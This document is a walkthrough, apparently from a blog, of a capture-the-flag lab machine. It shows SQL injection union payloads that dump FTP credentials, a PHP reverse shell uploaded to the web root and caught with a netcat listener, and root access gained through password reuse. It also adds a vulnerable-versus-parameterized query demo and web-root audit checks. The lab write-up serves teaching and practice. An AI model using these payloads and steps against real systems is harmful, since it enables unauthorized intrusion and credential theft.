The_Library target machine


Information gathering

┌──(kali㉿kali)-[~/Downloads/The_Library]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.142
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 11:07 EDT
Nmap scan report for 192.1.1.142
Host is up (0.00031s latency).
Not shown: 55531 filtered tcp ports (no-response), 10002 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
MAC Address: 00:0C:29:E5:3F:72 (VMware)

Ports 21 and 80 are open.

┌──(kali㉿kali)-[~/Downloads/The_Library]
└─$ sudo nmap -sT -sV -sC -O -p21,80 192.1.1.142
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 11:08 EDT
Nmap scan report for 192.1.1.142
Host is up (0.00026s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:E5:3F:72 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.9 (97%), Linux 3.16 - 4.6 (95%), Linux 4.2 (94%), Linux 3.13 (93%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (93%), Linux 4.10 (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Linux 3.2 - 3.10 (93%), Linux 3.2 - 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

The operating system is Ubuntu.

┌──(kali㉿kali)-[~/Downloads/The_Library]
└─$ sudo nmap --script=vuln -p21,80 192.1.1.142
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 11:10 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.1.1.142
Host is up (0.00022s latency).

PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 00:0C:29:E5:3F:72 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 352.05 seconds

No obvious vulnerabilities or website paths.

Tried anonymous FTP login; it failed, so the only option left is web penetration.

Web penetration

While checking the web interface, run directory brute-forcing at the same time. The web interface is the Apache2 Ubuntu Default Page, so wait for the directory brute-force results.

┌──(kali㉿kali)-[~/Downloads/The_Library]
└─$ sudo dirsearch -u http://192.1.1.142
[sudo] password for kali:

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.142/_23-08-15_11-16-53.txt

Error Log: /root/.dirsearch/logs/errors-23-08-15_11-16-53.log

Target: http://192.1.1.142/

[11:16:53] Starting:
[11:16:54] 403 - 297B - /.ht_wsr.txt
[11:16:54] 403 - 300B - /.htaccess.bak1
[11:16:54] 403 - 300B - /.htaccess.orig
[11:16:54] 403 - 300B - /.htaccess.save
[11:16:54] 403 - 302B - /.htaccess.sample
[11:16:54] 403 - 298B - /.htaccessBAK
[11:16:54] 403 - 301B - /.htaccess_extra
[11:16:54] 403 - 298B - /.htaccess_sc
[11:16:54] 403 - 300B - /.htaccess_orig
[11:16:54] 403 - 299B - /.htaccessOLD2
[11:16:54] 403 - 298B - /.htaccessOLD
[11:16:54] 403 - 290B - /.htm
[11:16:54] 403 - 291B - /.html
[11:16:54] 403 - 296B - /.htpasswds
[11:16:54] 403 - 300B - /.htpasswd_test
[11:16:54] 403 - 297B - /.httr-oauth
[11:16:55] 403 - 290B - /.php
[11:16:55] 403 - 291B - /.php3
[11:17:11] 200 - 11KB - /index.html
[11:17:12] 200 - 2KB - /library.php
[11:17:19] 403 - 300B - /server-status/
[11:17:19] 403 - 299B - /server-status

SQL injection

I see an interesting file, library.php; clicking it reveals a clickable button.

Let's look at the request captured by Burp Suite.

Looking closely, a few points stand out. Although the message carries no information, "We couldn't find any information for" should in theory be followed by an object, and the trailing period at the end is another hint. There is very likely an attack path here. Next I tried fuzzing the values of lastviewed and country, but the results were not promising. Then I noticed an algorithm marker in the response source:

<!-- ripemd160 -->

Based on this algorithm marker I tried hashing the lastviewed and country values, but still got nothing, and I was stuck here for quite a while. Reflecting on why I couldn't think my way further along the attack path: on the one hand I have been a bit restless lately and not thinking deeply enough; on the other, my understanding of injection points is still off. I noticed the injection point but didn't take it seriously, and only tested the most obvious one.

Identifying the injection point is one thing; constructing a suitable payload for it is another test of our skills.

I tried Burp Suite's built-in SQL injection and fuzzing wordlists, but neither produced anything.

Using sqlmap directly also had problems (I'm still not clear on how to specify the injection point in sqlmap; I need to set aside time to learn it properly), and it crashed the target's service, so I had to restart the VM.

This time I'll use a wordlist from SecLists.

Something very interesting turned up: when the value is 0, an extra "Norway" appears in the response.

Continuing, 0 and 1=1 produces output, while 0 and 1=2 produces none (Norway is empty). This confirms that injection exists and that it is numeric. Next come the classic steps: first use order by to determine the number of columns.

0 order by 2
0 order by 1

The column count is 1. Next we continue constructing:

0 union select database()
# Here the result echoes directly. If it did not, we would need to change the 0 to 1, artificially making the preceding query return nothing so that the union result is not overwritten (covered up in the display position).

1 union select database()

The site is built with PHP, so the database is probably MySQL; try MySQL first.

0 union select group_concat(table_name) from information_schema.tables where table_schema='library'

# Returned result
access,countries

It is indeed MySQL. Continue building SQL statements.

0 union select group_concat(column_name) from information_schema.columns where table_name='access'

# Returned result
id,service,username,password

Now the exciting moment: we can finally see the table contents. Construct as follows:

0 union select group_concat(id,service,0x2D,username,0x2D,password) from access

# Returned result
1ftp-globus-AroundTheWor
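As an added illustration (not code from the writeup), the following Python/sqlite3 stand-in for the site's PHP/MySQL backend reproduces the flaw behind the steps above and its fix: the vulnerable lookup concatenates the numeric parameter into the query, so the boolean and union payloads from this section work against it, while the hardened lookup validates the value and binds it as a parameter. Table names follow the page; the rows, helper names and placeholder password are constructed.

```python
import sqlite3

# Constructed stand-in for the writeup's PHP/MySQL backend (sample data, not
# the target's): a `countries` table looked up by numeric id, and the `access`
# table with the columns the injection recovered (id, service, username,
# password). The password here is a placeholder, not the one from the page.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE countries(id INTEGER, name TEXT);
        INSERT INTO countries VALUES (1, 'Norway'), (2, 'Sweden');
        CREATE TABLE access(id INTEGER, service TEXT, username TEXT, password TEXT);
        INSERT INTO access VALUES (1, 'ftp', 'globus', 'EXAMPLE-PASSWORD');
    """)
    return con

def lookup_vulnerable(con, country_id):
    # The flaw the writeup found: the request parameter is pasted into the
    # query text, so "1 and 1=2" or "0 union select ..." becomes SQL.
    sql = "SELECT name FROM countries WHERE id = " + country_id
    return [row[0] for row in con.execute(sql)]

def lookup_hardened(con, country_id):
    # Fix: reject anything that is not a plain integer at the edge, then bind
    # the value as a parameter so it can never be parsed as SQL.
    if not country_id.isdigit():
        raise ValueError("country id must be a non-negative integer")
    sql = "SELECT name FROM countries WHERE id = ?"
    return [row[0] for row in con.execute(sql, (int(country_id),))]

# Payloads from the writeup, in SQLite syntax (|| for string concatenation
# and '-' in place of MySQL's 0x2D).
BOOL_TRUE = "1 and 1=1"
BOOL_FALSE = "1 and 1=2"
DUMP_ACCESS = ("0 union select group_concat(id||service||'-'||username||'-'||password)"
               " from access")

if __name__ == "__main__":
    db = build_db()
    for p in (BOOL_TRUE, BOOL_FALSE, DUMP_ACCESS):
        print("vulnerable:", repr(p), "->", lookup_vulnerable(db, p))
        try:
            print("hardened:  ", repr(p), "->", lookup_hardened(db, p))
        except ValueError as e:
            print("hardened:  ", repr(p), "-> rejected:", e)
```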

We've got the FTP username and password; log in and take a look.

┌──(kali㉿kali)-[~/Downloads/The_Library]
└─$ ftp 192.1.1.142
Connected to 192.1.1.142.
220 (vsFTPd 3.0.3)
Name (192.1.1.142:kali): globus
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||43525|)
150 Here comes the directory listing.
drwxrwxrwx 2 1001 1001 4096 Jul 22 2019 html
226 Directory send OK.
ftp> cd html
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||58705|)
150 Here comes the directory listing.
-rwxrwxrwx 1 0 0 11321 Jul 17 2019 index.html
-rwxrwxrwx 1 0 0 2831 Jul 22 2019 library.php
-rwxrwxrwx 1 0 0 3172 Jul 21 2019 style.css
226 Directory send OK.

It's the web root! Just upload a PHP reverse shell file.

ftp> put php-reverse-shell.php 
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||53363|)
150 Ok to send data.
100% |***********************************************************************| 3461 48.53 MiB/s 00:00 ETA
226 Transfer complete.
3461 bytes sent in 00:00 (7.08 MiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||23655|)
150 Here comes the directory listing.
-rwxrwxrwx 1 0 0 11321 Jul 17 2019 index.html
-rwxrwxrwx 1 0 0 2831 Jul 22 2019 library.php
-rw------- 1 1001 1001 3461 Aug 15 10:55 php-reverse-shell.php
-rwxrwxrwx 1 0 0 3172 Jul 21 2019 style.css
226 Directory send OK.
ftp> chmod 777 php-reverse-shell.php
200 SITE CHMOD command ok.

After a successful upload, the file permissions still need to be changed.
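Two defender-side checks that follow from this step, added here and not part of the original writeup: list world-writable entries and freshly modified PHP files under a web root (the html/ directory and its files were rwxrwxrwx, and the upload was chmod 777'd), and flag accounts whose home directory is the web root, which is what put the FTP login straight into the document root. The paths are example values.

```shell
# Added defender-side checks; the paths below are examples, not the target's.

# 1. World-writable entries and recently modified PHP files under a web root
#    (on the target, html/ and its files were rwxrwxrwx and the uploaded
#    php-reverse-shell.php was chmod 777'd). $1 = web root, $2 = days (default 7).
audit_webroot() {
    find "$1" -perm -002 -print
    find "$1" -name '*.php' -mtime "-${2:-7}" -print
}

# Number of world-writable entries under $1 (usable as a monitoring threshold).
count_world_writable() {
    find "$1" -perm -002 | wc -l | tr -d ' '
}

# 2. Accounts whose home directory is the web root or lies inside it, read
#    from the passwd file given as $1 (on the target, globus's home was
#    /var/www, so an FTP login landed in the document root). $2 = web root.
homes_in_webroot() {
    awk -F: -v root="$2" \
        '$6 == root || index($6, root "/") == 1 { print $1 ":" $6 }' "$1"
}

# Example invocation on a live host (uncomment to use):
# audit_webroot /var/www/html 7
# homes_in_webroot /etc/passwd /var/www
```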

Reverse shell

Start a listener on the attacking machine, then visit the uploaded file in the browser to get the reverse shell.

┌──(kali㉿kali)-[~/Downloads/The_Library]
└─$ sudo nc -lvnp 1234
[sudo] password for kali:
listening on [any] 1234 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.142] 40564
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
10:57:17 up 25 min, 0 users, load average: 0.00, 0.18, 0.41
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:e5:3f:72 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.142/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1157sec preferred_lft 1157sec
inet6 fe80::c618:cfcc:b9c1:293c/64 scope link
valid_lft forever preferred_lft forever
$ uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/$ sudo -l
sudo -l
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data: AroundTheWorld

Sorry, try again.
[sudo] password for www-data:

sudo: 3 incorrect password attempts
www-data@ubuntu:/$ ls -liah /home
ls -liah /home
total 16K
393217 drwxr-xr-x 4 root root 4.0K Jul 22 2019 .
2 drwxr-xr-x 24 root root 4.0K Jul 17 2019 ..
406288 drwxr-xr-x 2 globus globus 4.0K Jul 22 2019 globus
405562 drwxr-xr-x 16 library library 4.0K Jul 22 2019 library

There's a user with the same name as the FTP user, so let's see whether the FTP password works for switching to that user.

www-data@ubuntu:/$ su globus   
su globus
Password: AroundTheWorld

globus@ubuntu:~/html$ sudo -l
sudo -l
[sudo] password for globus: AroundTheWorld

Sorry, user globus may not run sudo on ubuntu.

Success. Next I did some basic enumeration across directories: user home directories, passwd file permissions, cron jobs, SUID files, and running processes. I saw MySQL running, so I went to the web root to look for database connection credentials.

In library.php I found the following:

$DATABASE_HOST = 'localhost';
$DATABASE_USER = 'username';
$DATABASE_PASS = 'password';
$DATABASE_NAME = 'library';

Password reuse

Try logging in as root with the password "password".

globus@ubuntu:~/html$ su root
su root
Password: password

root@ubuntu:/var/www/html# cd /root
cd /root
root@ubuntu:~# ls -liah
ls -liah
total 64K
786434 drwx------ 10 root root 4.0K Jul 22 2019 .
2 drwxr-xr-x 24 root root 4.0K Jul 17 2019 ..
788540 -rw------- 1 root root 550 Jul 22 2019 .bash_history
789161 -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
789160 drwx------ 5 root root 4.0K Jul 21 2019 .cache
788545 drwxr-xr-x 5 root root 4.0K Jul 17 2019 .config
788539 drwx------ 3 root root 4.0K Jul 17 2019 .dbus
788573 drwxr-xr-x 2 root root 4.0K Jul 21 2019 Desktop
788588 drwx------ 2 root root 4.0K Jul 21 2019 .gconf
788549 drwxr-xr-x 3 root root 4.0K Jul 17 2019 .local
788553 drwx------ 4 root root 4.0K Jul 21 2019 .mozilla
786436 -rw------- 1 root root 2.3K Jul 21 2019 .mysql_history
788676 drwxr-xr-x 2 root root 4.0K Jul 22 2019 .nano
789162 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
788567 -rw------- 1 root root 5.7K Jul 22 2019 .viminfo
root@ubuntu:~# cd Desktop
cd Desktop
root@ubuntu:~/Desktop# ls -liah
ls -liah
total 8.0K
788573 drwxr-xr-x 2 root root 4.0K Jul 21 2019 .
786434 drwx------ 10 root root 4.0K Jul 22 2019 ..

No flag file; the battle is over!


The_Library target machine
https://i3eg1nner.github.io/2023/08/6d61acd6e537.html
Author: I3eg1nner
Published on: August 15, 2023